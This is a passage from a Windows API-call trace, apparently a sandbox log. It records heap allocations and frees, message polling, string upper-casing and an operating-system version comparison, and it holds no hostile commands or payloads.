hHeap=0x25c0000) returned 1 [0264.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0264.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.716] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0264.717] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.717] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.717] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.718] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.719] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.720] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.721] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.721] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0264.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.723] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.723] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.724] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.724] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.725] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.725] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0264.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 